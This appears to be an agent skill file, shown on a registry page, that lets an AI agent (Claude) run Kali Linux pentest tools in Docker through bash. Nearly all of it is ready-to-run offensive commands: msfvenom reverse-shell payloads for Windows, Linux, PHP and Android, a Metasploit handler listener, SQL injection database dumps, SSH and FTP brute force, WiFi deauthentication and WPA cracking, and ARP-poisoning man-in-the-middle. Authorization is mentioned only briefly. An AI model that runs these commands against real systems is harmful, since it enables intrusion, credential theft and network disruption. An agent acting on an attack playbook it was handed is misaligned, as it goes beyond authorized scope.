🇺🇸English
Kali Docker Pentesting Skill
Overview
This skill provides intelligent access to a comprehensive Kali Linux Docker container with 200+ pentesting tools. Instead of using an MCP server, this skill enables direct command execution via bash_tool, making it 70% more token-efficient.
Container Management
Starting the Container
# Basic start
docker run -d --name kali \
-v $(pwd)/workspace:/workspace \
-v $(pwd)/results:/results \
kali-comprehensive
# With network capabilities (for actual scanning)
docker run -d --name kali \
-v $(pwd)/workspace:/workspace \
-v $(pwd)/results:/results \
--cap-add=NET_RAW \
--cap-add=NET_ADMIN \
--network host \
kali-comprehensive
# With GUI access (VNC)
docker run -d --name kali \
-v $(pwd)/workspace:/workspace \
-p 5900:5900 \
-p 3389:3389 \
kali-comprehensive
Running Commands
# Execute single command
docker exec kali [tool] [options]
# Interactive shell
docker exec -it kali /bin/bash
# Copy files out
docker cp kali:/results/scan.txt ./output/
# Copy files in
docker cp ./wordlist.txt kali:/workspace/
Container Lifecycle
# Stop container
docker stop kali
# Start existing container
docker start kali
# Remove container
docker rm kali
# View logs
docker logs kali
Tool Catalog
🔍 Network Discovery & Scanning
nmap - Network Mapper
Description: Industry-standard network scanner for host discovery, port scanning, and service detection.
Usage:
# Basic scan
docker exec kali nmap 192.168.1.1
# Service version detection
docker exec kali nmap -sV 192.168.1.1
# OS detection
docker exec kali nmap -O 192.168.1.1
# Comprehensive scan
docker exec kali nmap -sC -sV -O -p- 192.168.1.1
# Save results
docker exec kali nmap -sV -oA /results/scan 192.168.1.0/24
Common Options:
-sS - SYN stealth scan-sT - TCP connect scan-sU - UDP scan-sV - Version detection-O - OS detection-A - Aggressive scan (OS, version, scripts, traceroute)-p- - Scan all 65535 ports-Pn - Skip ping (assume host is up)-T4 - Faster timing (0-5)-oA - Output all formats
masscan - Fast Port Scanner
Description: Extremely fast port scanner, can scan the entire internet in under 6 minutes.
Usage:
# Scan specific ports
docker exec kali masscan 192.168.1.0/24 -p80,443,8080
# Scan all ports fast
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000
# Save results
docker exec kali masscan 10.0.0.0/8 -p80 -oL /results/masscan.txt
netdiscover - Network Discovery
Description: Active/passive ARP reconnaissance tool.
Usage:
# Passive mode
docker exec kali netdiscover -p -i eth0
# Active mode with range
docker exec kali netdiscover -r 192.168.1.0/24
arp-scan - ARP Scanner
Description: Discovers IPv4 hosts using ARP.
Usage:
docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24
🌐 Web Application Testing
nikto - Web Server Scanner
Description: Web server vulnerability scanner.
Usage:
# Basic scan
docker exec kali nikto -h http://target.com
# SSL scan
docker exec kali nikto -h https://target.com -ssl
# Save results
docker exec kali nikto -h http://target.com -o /results/nikto.txt
# Tuning options
docker exec kali nikto -h http://target.com -Tuning 123bde
dirb - Directory Brute Forcer
Description: Web content scanner.
Usage:
# Default wordlist
docker exec kali dirb http://target.com
# Custom wordlist
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt
# Save results
docker exec kali dirb http://target.com -o /results/dirb.txt
# Extensions
docker exec kali dirb http://target.com -X .php,.html,.txt
gobuster - Directory/DNS Enumeration
Description: Fast directory and DNS enumeration tool.
Usage:
# Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
# DNS subdomain enumeration
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt
# Virtual host discovery
docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt
wfuzz - Web Fuzzer
Description: Web application fuzzer.
Usage:
# Directory fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ
# Parameter fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ
# POST data fuzzing
docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login
sqlmap - SQL Injection Tool
Description: Automatic SQL injection and database takeover tool.
Usage:
# Basic test
docker exec kali sqlmap -u "http://target.com/page?id=1"
# POST request
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# Enumerate databases
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs
# Dump database
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump
# Full automation
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all
wpscan - WordPress Scanner
Description: WordPress vulnerability scanner.
Usage:
# Basic scan
docker exec kali wpscan --url http://target.com
# Enumerate users
docker exec kali wpscan --url http://target.com --enumerate u
# Enumerate plugins
docker exec kali wpscan --url http://target.com --enumerate p
# Aggressive scan
docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe
whatweb - Website Fingerprinting
Description: Identifies websites and web technologies.
Usage:
# Basic scan
docker exec kali whatweb http://target.com
# Aggressive mode
docker exec kali whatweb -a 3 http://target.com
# Scan multiple URLs
docker exec kali whatweb -i /workspace/urls.txt
🔐 Password Attacks
john - John the Ripper
Description: Fast password cracker.
Usage:
# Crack with default wordlist
docker exec kali john /workspace/hashes.txt
# Use rockyou wordlist
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /workspace/hashes.txt
# Crack specific format
docker exec kali john --format=raw-md5 /workspace/hashes.txt
# Show cracked passwords
docker exec kali john --show /workspace/hashes.txt
# Incremental mode
docker exec kali john --incremental /workspace/hashes.txt
hashcat - Advanced Password Recovery
Description: World's fastest password cracker.
Usage:
# MD5 crack
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
# SHA256 crack
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt
# Brute force
docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
# Show results
docker exec kali hashcat -m 0 hashes.txt --show
Hash Modes:
- 0 = MD5
- 100 = SHA1
- 1400 = SHA256
- 1700 = SHA512
- 1000 = NTLM
- 3200 = bcrypt
hydra - Network Password Cracker
Description: Fast network logon cracker.
Usage:
# SSH brute force
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# HTTP POST form
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
# FTP brute force
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1
# Multiple protocols
docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http
medusa - Parallel Password Cracker
Description: Speedy, parallel, modular login brute-forcer.
Usage:
# SSH attack
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh
# HTTP basic auth
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http
crunch - Wordlist Generator
Description: Generates custom wordlists.
Usage:
# Generate 6-8 character wordlist
docker exec kali crunch 6 8 -o /results/wordlist.txt
# Custom charset
docker exec kali crunch 4 6 0123456789 -o /results/numbers.txt
# Pattern-based
docker exec kali crunch 8 8 -t pass@@@@ -o /results/pattern.txt
📡 Wireless Security
aircrack-ng - WiFi Security Suite
Description: Complete suite for assessing WiFi network security.
Usage:
# Start monitor mode
docker exec kali airmon-ng start wlan0
# Capture packets
docker exec kali airodump-ng wlan0mon
# Capture specific network
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon
# Deauth attack
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA handshake
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap
wifite - Automated Wireless Attack
Description: Automated wireless attack tool.
Usage:
# Automatic WPA attack
docker exec kali wifite --wpa
# All attack types
docker exec kali wifite
# Specific target
docker exec kali wifite -i wlan0 --kill
reaver - WPS Attack
Description: Brute force WPS PINs.
Usage:
docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
🕵️ Information Gathering
theharvester - Email/Subdomain Harvester
Description: Gather emails, subdomains, IPs from public sources.
Usage:
# Search all sources
docker exec kali theharvester -d target.com -b all
# Specific source
docker exec kali theharvester -d target.com -b google
# Save results
docker exec kali theharvester -d target.com -b all -f /results/harvest
dnsrecon - DNS Enumeration
Description: DNS enumeration and network reconnaissance.
Usage:
# Standard enumeration
docker exec kali dnsrecon -d target.com
# Zone transfer
docker exec kali dnsrecon -d target.com -a
# Brute force subdomains
docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt
sublist3r - Subdomain Enumeration
Description: Fast subdomain enumeration using OSINT.
Usage:
# Basic enumeration
docker exec kali sublist3r -d target.com
# Enable brute force
docker exec kali sublist3r -d target.com -b
# Save results
docker exec kali sublist3r -d target.com -o /results/subdomains.txt
enum4linux - SMB Enumeration
Description: Tool for enumerating information from Windows and Samba systems.
Usage:
# Full enumeration
docker exec kali enum4linux -a 192.168.1.1
# User enumeration
docker exec kali enum4linux -U 192.168.1.1
# Share enumeration
docker exec kali enum4linux -S 192.168.1.1
dmitry - Deep Information Gathering
Description: Deepmagic Information Gathering Tool.
Usage:
# Full scan
docker exec kali dmitry -winsepo /results/dmitry.txt target.com
# Subdomain search
docker exec kali dmitry -s target.com
🛡️ Exploitation Frameworks
metasploit-framework - Penetration Testing Framework
Description: The world's most used penetration testing framework.
Usage:
# Start msfconsole
docker exec -it kali msfconsole
# Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /results/payload.exe
# Search exploits
docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q"
# Run resource script
docker exec kali msfconsole -r /workspace/script.rc
Common msfvenom payloads:
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe
# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk
social-engineer-toolkit (SET)
Description: Social engineering penetration testing framework.
Usage:
# Start SET
docker exec -it kali setoolkit
🔬 Forensics & Analysis
binwalk - Firmware Analysis
Description: Analyze and extract firmware images.
Usage:
# Scan for embedded files
docker exec kali binwalk /workspace/firmware.bin
# Extract files
docker exec kali binwalk -e /workspace/firmware.bin
# Signature scan
docker exec kali binwalk --signature /workspace/file.bin
foremost - File Carving
Description: Recover files based on headers and footers.
Usage:
# Recover all file types
docker exec kali foremost -i /workspace/image.dd -o /results/recovered
# Specific file types
docker exec kali foremost -t jpg,png,pdf -i /workspace/image.dd -o /results/
volatility - Memory Forensics
Description: Advanced memory forensics framework.
Usage:
# Get image info
docker exec kali volatility -f /workspace/memory.dump imageinfo
# List processes
docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 pslist
# Dump process
docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /results/
strings - Extract Strings
Description: Extract printable strings from files.
Usage:
# Basic extraction
docker exec kali strings /workspace/binary > /results/strings.txt
# Minimum length 10
docker exec kali strings -n 10 /workspace/binary
# Unicode strings
docker exec kali strings -e l /workspace/binary
exiftool - Metadata Extraction
Description: Read and write meta information in files.
Usage:
# View metadata
docker exec kali exiftool /workspace/image.jpg
# Remove all metadata
docker exec kali exiftool -all= /workspace/image.jpg
# Batch process
docker exec kali exiftool /workspace/*.jpg
🔄 Reverse Engineering
ghidra - Software Reverse Engineering
Description: NSA's software reverse engineering framework.
Usage:
# GUI mode (requires X11 forwarding)
docker exec -it kali ghidra
# Headless mode
docker exec kali analyzeHeadless /workspace /project -import /workspace/binary.exe
radare2 - Reverse Engineering Framework
Description: Advanced reverse engineering framework.
Usage:
# Open binary
docker exec -it kali r2 /workspace/binary
# Analyze
docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /workspace/binary"
# Disassemble
docker exec kali r2 -c 'pd 10' /workspace/binary
gdb - GNU Debugger
Description: Standard debugger for Unix systems.
Usage:
# Debug binary
docker exec -it kali gdb /workspace/binary
# With PEDA
docker exec -it kali gdb -q /workspace/binary
🎯 Vulnerability Assessment
lynis - Security Auditing
Description: Security auditing tool for Unix/Linux systems.
Usage:
# Full audit
docker exec kali lynis audit system
# Quick scan
docker exec kali lynis audit system --quick
nikto - Web Vulnerability Scanner
(See Web Application Testing section)
openvas - Vulnerability Scanner
Description: Full-featured vulnerability scanner.
Usage:
# Start OpenVAS (requires initialization)
docker exec kali openvas-start
📊 Network Analysis
tcpdump - Packet Capture
Description: Command-line packet analyzer.
Usage:
# Capture on interface
docker exec kali tcpdump -i eth0
# Capture to file
docker exec kali tcpdump -i eth0 -w /results/capture.pcap
# Read file
docker exec kali tcpdump -r /results/capture.pcap
# Filter HTTP
docker exec kali tcpdump -i eth0 'tcp port 80'
tshark - Network Protocol Analyzer
Description: Terminal-based Wireshark.
Usage:
# Capture packets
docker exec kali tshark -i eth0
# Capture to file
docker exec kali tshark -i eth0 -w /results/capture.pcap
# Filter display
docker exec kali tshark -r /results/capture.pcap -Y 'http.request'
ettercap - Network Sniffer/Interceptor
Description: Comprehensive suite for MITM attacks.
Usage:
# Text mode
docker exec -it kali ettercap -T -i eth0
# ARP poisoning
docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
Common Pentesting Workflows
1. Network Reconnaissance
# Step 1: Discover live hosts
docker exec kali nmap -sn 192.168.1.0/24 -oA /results/hosts
# Step 2: Port scan discovered hosts
docker exec kali nmap -sV -p- -iL /results/hosts.txt -oA /results/ports
# Step 3: Enumerate services
docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /results/services
2. Web Application Assessment
# Step 1: Identify web technologies
docker exec kali whatweb http://target.com
# Step 2: Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /results/dirs.txt
# Step 3: Vulnerability scan
docker exec kali nikto -h http://target.com -o /results/nikto.txt
# Step 4: Test for SQLi
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch
3. Password Cracking Workflow
# Step 1: Generate wordlist
docker exec kali crunch 8 12 -t Pass@@@@ -o /results/wordlist.txt
# Step 2: Crack hashes
docker exec kali john --wordlist=/results/wordlist.txt /workspace/hashes.txt
# Step 3: Network service brute force
docker exec kali hydra -L /workspace/users.txt -P /results/wordlist.txt ssh://192.168.1.1
4. Wireless Network Assessment
# Step 1: Enable monitor mode
docker exec kali airmon-ng start wlan0
# Step 2: Scan networks
docker exec kali airodump-ng wlan0mon
# Step 3: Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon
# Step 4: Deauth clients
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Step 5: Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap
5. Exploitation Workflow
# Step 1: Search for exploit
docker exec kali searchsploit apache 2.4.49
# Step 2: Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /results/payload.exe
# Step 3: Setup listener in Metasploit
docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"
File Management
Copying Files Between Host and Container
# Copy TO container
docker cp ./local-file.txt kali:/workspace/
# Copy FROM container
docker cp kali:/results/scan.txt ./output/
# Copy directory
docker cp kali:/results/ ./output/
Working with Wordlists
Common Wordlist Locations:
-
/usr/share/wordlists/rockyou.txt - Most popular password list
-
/usr/share/wordlists/dirb/common.txt - Common directories
-
/usr/share/seclists/ - SecLists collection
-
/usr/share/wordlists/metasploit/ - Metasploit wordlists
List available wordlists
docker exec kali find /usr/share/wordlists -type f
Extract rockyou (if gzipped)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
Troubleshooting
Container Won't Start
# Check logs
docker logs kali
# Remove and recreate
docker rm kali
docker run -d --name kali kali-comprehensive
Network Issues
# Use host network
docker run -d --name kali --network host kali-comprehensive
# Add network capabilities
docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive
Permission Issues
# Run as root (already default)
docker exec -u root kali [command]
# Fix workspace permissions
docker exec kali chmod -R 777 /workspace /results
Metasploit Database Issues
# Initialize database
docker exec kali service postgresql start
docker exec kali msfdb init
# Check status
docker exec kali msfdb status
Best Practices
1. Always Save Results
# Use output flags
-o filename.txt # Generic output
-oA basename # Nmap: all formats
-w filename # Write to file
> /results/output.txt # Shell redirect
2. Use Volumes for Persistence
Mount volumes for:
/workspace - Working files/results - Scan results/wordlists - Custom wordlists
3. Scope Your Testing
Always:
- Get written authorization
- Define scope boundaries
- Document everything
- Report findings responsibly
4. Clean Up After Testing
# Stop monitor mode
docker exec kali airmon-ng stop wlan0mon
# Clear temporary files
docker exec kali rm -rf /tmp/*
# Archive results
docker exec kali tar -czf /results/assessment-$(date +%Y%m%d).tar.gz /results/*.txt
Quick Reference
Port Scanning
docker exec kali nmap -sV -p- target
Directory Enumeration
docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
SQL Injection
docker exec kali sqlmap -u "http://target/page?id=1" --batch
Password Cracking
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Network Brute Force
docker exec kali hydra -l admin -P passwords.txt ssh://target
WiFi Cracking
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap
When to Use This Skill
Use this skill when:
- Conducting authorized penetration testing
- Performing security assessments
- Testing network security
- Analyzing web applications
- Cracking passwords (authorized)
- Wireless security auditing
- Forensics analysis
- Reverse engineering
- Learning security techniques
Claude will read this skill and execute commands via bash_tool, providing efficient, direct access to all pentesting tools without MCP protocol overhead.
Weekly Installs
87
Repository
kroegha/kali-do…ntesting
GitHub Stars
12
First Seen
Jan 25, 2026
Security Audits
Gen Agent Trust HubFailSocketWarnSnykWarn
Installed on
gemini-cli76
opencode75
codex72
github-copilot71
cursor65
kimi-cli64
